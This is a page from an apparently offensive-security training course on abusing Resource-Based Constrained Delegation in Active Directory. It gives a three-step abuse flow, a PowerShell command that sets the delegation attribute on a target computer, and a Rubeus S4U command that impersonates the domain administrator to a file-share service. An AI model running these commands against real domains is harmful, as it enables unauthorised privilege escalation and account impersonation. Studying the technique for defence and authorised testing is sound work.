Home > Active Directory Security > Module 3 > RBCD

Resource-Based Constrained Delegation

Abuse RBCD to impersonate users to services you control.

Advanced90 min

Abuse Flow

  1. Create or compromise a machine account
  2. Grant it rights in target computer's msDS-AllowedToActOnBehalfOfOtherIdentity
  3. Request S4U2Self/S4U2Proxy to impersonate a privileged user

Key Commands

# PowerShell - set RBCD on target
Set-ADComputer TARGET -Add @{'msds-allowedtoactonbehalfofotheridentity'=$binsecdesc}

# Rubeus S4U
Rubeus.exe s4u /user:svc_web /rc4:<NTLM> /impersonateuser:administrator /msdsspn:cifs/target.domain.local /ptt
← Previous Next: Domain Takeover Paths →